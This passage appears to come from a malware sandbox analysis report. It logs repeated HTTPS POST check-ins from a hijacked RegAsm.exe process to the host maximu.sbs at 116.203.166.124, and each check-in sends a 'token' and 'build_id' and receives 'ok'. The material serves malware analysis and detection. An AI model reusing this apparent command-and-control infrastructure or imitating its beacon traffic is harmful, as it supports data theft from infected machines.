                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:45 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 67 34 6f 70 38 67 76 6b 78 74 32 76 33 37 71 31 6e 6f 68 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------g4op8gvkxt2v37q1nohdContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------g4op8gvkxt2v37q1nohdContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------g4op8gvkxt2v37q1nohdCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:46 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:46 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          31192.168.2.449786116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:46 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----kno8yc26xt2v3eus00hd
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:46 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 6e 6f 38 79 63 32 36 78 74 32 76 33 65 75 73 30 30 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 6f 38 79 63 32 36 78 74 32 76 33 65 75 73 30 30 68 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 6b 6e 6f 38 79 63 32 36 78 74 32 76 33 65 75 73 30 30 68 64 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------kno8yc26xt2v3eus00hdContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------kno8yc26xt2v3eus00hdContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------kno8yc26xt2v3eus00hdCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:47 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:47 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          32192.168.2.449787116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:47 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----w47qq9rqqimozu3e3ekx
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:47 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------w47qq9rqqimozu3e3ekxContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------w47qq9rqqimozu3e3ekxContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------w47qq9rqqimozu3e3ekxCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:48 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:48 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          33192.168.2.449788116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:48 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----w47qq9rqqimozu3e3ekx
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:48 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------w47qq9rqqimozu3e3ekxContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------w47qq9rqqimozu3e3ekxContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------w47qq9rqqimozu3e3ekxCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:49 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:49 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          34192.168.2.449789116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:49 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----q16f3w4oz5fcbim7q16p
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:49 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------q16f3w4oz5fcbim7q16pContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------q16f3w4oz5fcbim7q16pContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------q16f3w4oz5fcbim7q16pCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:50 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:50 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          35192.168.2.449790116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:50 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----q16f3w4oz5fcbim7q16p
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:50 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------q16f3w4oz5fcbim7q16pContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------q16f3w4oz5fcbim7q16pContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------q16f3w4oz5fcbim7q16pCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:51 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:51 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          36192.168.2.449791116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:51 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----q16f3w4oz5fcbim7q16p
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1837
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:51 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 71 31 36 66 33 77 34 6f 7a 35 66 63 62 69 6d 37 71 31 36 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------q16f3w4oz5fcbim7q16pContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------q16f3w4oz5fcbim7q16pContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------q16f3w4oz5fcbim7q16pCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:52 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:52 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          37192.168.2.449792116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:52 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----3wbaas00z5fcje3opzu3
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:52 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 33 77 62 61 61 73 30 30 7a 35 66 63 6a 65 33 6f 70 7a 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 33 77 62 61 61 73 30 30 7a 35 66 63 6a 65 33 6f 70 7a 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 33 77 62 61 61 73 30 30 7a 35 66 63 6a 65 33 6f 70 7a 75 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------3wbaas00z5fcje3opzu3Content-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------3wbaas00z5fcje3opzu3Content-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------3wbaas00z5fcje3opzu3Cont
                                                                                                                                                                                                                                                          2025-01-13 19:18:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:53 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:53 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          38192.168.2.449793116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:53 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----3wbaas00z5fcje3opzu3
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1825
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:53 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 33 77 62 61 61 73 30 30 7a 35 66 63 6a 65 33 6f 70 7a 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 33 77 62 61 61 73 30 30 7a 35 66 63 6a 65 33 6f 70 7a 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 33 77 62 61 61 73 30 30 7a 35 66 63 6a 65 33 6f 70 7a 75 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------3wbaas00z5fcje3opzu3Content-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------3wbaas00z5fcje3opzu3Content-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------3wbaas00z5fcje3opzu3Cont
                                                                                                                                                                                                                                                          2025-01-13 19:18:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:54 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:54 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          39192.168.2.449794116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:54 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8g4wtje3wtjwbaa16xtj
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 1841
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:54 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 38 67 34 77 74 6a 65 33 77 74 6a 77 62 61 61 31 36 78 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 38 67 34 77 74 6a 65 33 77 74 6a 77 62 61 61 31 36 78 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 38 67 34 77 74 6a 65 33 77 74 6a 77 62 61 61 31 36 78 74 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------8g4wtje3wtjwbaa16xtjContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------8g4wtje3wtjwbaa16xtjContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------8g4wtje3wtjwbaa16xtjCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:55 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:55 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
